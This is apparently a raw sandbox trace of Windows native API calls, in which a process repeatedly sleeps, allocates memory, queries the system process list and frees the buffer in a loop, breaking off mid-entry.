NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.299] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.300] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.300] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.303] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.304] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.305] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.306] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.306] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.308] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.311] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.312] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.314] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.314] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.314] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.315] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.318] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.319] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.321] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.321] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.321] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.322] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.325] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.326] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.327] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.327] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.328] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.328] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.328] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.332] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.332] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.334] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.334] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.335] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.335] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.335] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.339] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.340] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.341] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.341] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.342] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.342] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.342] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.345] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.346] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.347] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.348] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.348] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.348] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.349] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.361] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.361] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.363] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.363] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.364] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.364] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.370] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.371] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.372] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.372] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.373] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.374] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.378] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.380] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.380] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.381] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.381] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.382] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.385] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.386] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.388] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.388] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.389] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.389] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.390] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.395] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.397] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.397] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.399] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.399] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.399] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.404] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.405] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.408] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.408] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.409] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.410] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.410] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.414] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.415] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.416] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.416] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.425] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.430] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.432] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.433] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.433] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.434] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.438] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.440] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.442] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.443] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.443] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.443] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.448] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.449] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.450] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.451] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.451] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.451] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.455] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.456] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.457] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.457] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.458] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.458] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0250.458] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0250.462] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0250.463] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0250.465] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0250.465] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0250.466] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0250.466] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, 